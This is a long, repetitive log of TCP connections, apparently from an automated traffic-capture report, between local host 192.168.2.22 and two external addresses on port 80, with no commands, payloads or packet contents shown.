Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 54.241.153.192:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 54.241.153.192:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
Source: global traffic	TCP traffic: 198.46.177.156:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 198.46.177.156:80
